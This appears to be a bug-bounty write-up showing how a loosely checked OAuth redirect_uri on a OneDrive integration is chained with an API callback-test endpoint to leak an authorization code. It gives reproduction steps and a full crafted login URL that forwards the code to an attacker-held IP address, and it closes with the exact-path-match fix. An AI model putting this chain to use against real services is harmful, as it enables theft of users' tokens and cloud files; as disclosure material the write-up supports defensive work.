Stealing Access Token of One-drive Integration By Chaining CSRF Vulnerability
Severity: High
Complexity: Easy
Weakness: partial 0Auth redirect_uri path
Step’s to Reproduce:
- Site have Third Party integration tab at site.com/integrations. They have one-drive integration .
- When we Click Activate on Onedrive integration.
- We Get Redirected to :
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/account/skydriveOAuthCallback&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access
From Above URL:
redirect_uri=https://www.site.com/account/skydriveOAuthCallback
4. So i started playing with redirect_uri=
I Found that redirect_uri is Accepting Anything After
redirect_uri=https://www.site.com/account/xxxxxxxxxx
5. This Confirm’s that they haven’t used Strict Path in redirect_uri Allowing anything after redirect_uri=https://www.site.com/account/*
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/xxxxxxxxxxx&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access
6. So Now Possible way’s to Exploit this to get Access token is by Finding Any Open Redirect Vulnerability. So I Keep Looking for Any OpenRedirect Endpoints in site.com to Exploit but no luck.
7. Next day Started reading their API Documentation .
And I Came Across :
GET /api/testCallback?callback_url=http://yoursite.com
which they used for Checking API Callback Request’s on your server.
8. So Finally We Got CSRF Vulnerability Which Make’s GET Request to Attacker’s Server.
&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?
Finally:
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?&scope=wl.basic+wl.skydrive+wl.skydrive_update+wl.offline_access
~ Success ~
exact path matches should be made instead of partial matches on redirect_uri .
